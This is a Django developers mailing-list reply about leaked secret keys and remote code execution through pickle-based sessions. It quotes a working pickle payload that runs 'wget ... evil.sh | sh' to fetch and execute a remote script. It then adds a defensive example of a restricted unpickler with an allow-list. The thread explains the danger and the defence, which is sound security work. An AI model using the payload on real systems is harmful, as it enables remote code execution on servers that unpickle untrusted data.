Hi,

On Sunday, October 2, 2011 2:31:19 PM UTC+2, Paul McMillan wrote:
>
> > P.S.: Btw, if you leak your secret key, you can get an admin user with a
> > json backend too, while not being remote code execution it's still something
> > I would consider as catastrophic as code execution in most of my projects.
>
> No. It's far less catastrophic. It just means I'm a Django admin and can 
> trash that project (which you can then restore from the backups). I can't 
> own all your other Django projects on the same machine, steal your deploy 
> keys, root your server, and then configure it to attack your dev machine 
> when you SSH into it to see why weird things are happening. Remote code 
> execution is BAD.
>

Okay, even if you disagree, I consider both catastrophic (for me there is no 
such thing as less catastrophic -- heads would roll in either case).

> data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
> import pickle; pickle.loads(data)
>
> And then open a new bash window. 
>

Wow, I have to read up on pickle again, thanks for the great example -- 
though my "paranoia" forced me to try it without "|sh" no matter how 
trustworthy you are ;)

Thanks again for the explanation.

Cheers,
Florian
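To make the point of the thread concrete from the defensive side, here is an added example (not code from the thread or from Django) showing that the stock `pickle.loads` will call whatever global a payload names, and how a restricted unpickler refuses the lookup before anything runs. `SAFE_BUILTINS`, `classify` and both payloads are constructed for this illustration; the hostile payload points at the harmless `os.getcwd` instead of a shell command.

```python
import builtins
import io
import os
import pickle

# Builtins a session payload may legitimately reference; any other GLOBAL
# (os.system, subprocess.Popen, ...) is refused before it is ever looked up.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve arbitrary module globals."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Deserialise with the allow-list enforced."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def classify(data: bytes) -> str:
    """'ok' if the payload loads under the restricted unpickler,
    'blocked' if it tried to reach a forbidden global."""
    try:
        restricted_loads(data)
        return "ok"
    except pickle.UnpicklingError:
        return "blocked"


# Constructed benign session payload: a dict of scalars, no GLOBAL opcode.
BENIGN = pickle.dumps({"_auth_user_id": 1, "is_staff": False})

# Constructed hostile payload in protocol-0 opcodes, same shape as the one
# quoted above (GLOBAL, MARK, TUPLE, REDUCE, STOP), but naming os.getcwd.
HOSTILE = b"cos\ngetcwd\n(tR."


def stock_loads_calls_callable() -> bool:
    """Stock pickle resolves and calls the named global during loads()."""
    return pickle.loads(HOSTILE) == os.getcwd()


if __name__ == "__main__":
    print("stock pickle ran os.getcwd():", stock_loads_calls_callable())
    print("benign:", classify(BENIGN), "hostile:", classify(HOSTILE))
```

The allow-list approach is the one recommended in the `pickle` module documentation; the stronger fix, which Django later took, is a serializer that cannot name globals at all (JSON).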

-- 
You received this message because you are subscribed to the Google Groups 
"Django developers" group.
To view this discussion on the web visit 
https://groups.google.com/d/msg/django-developers/-/nfg07OnF898J.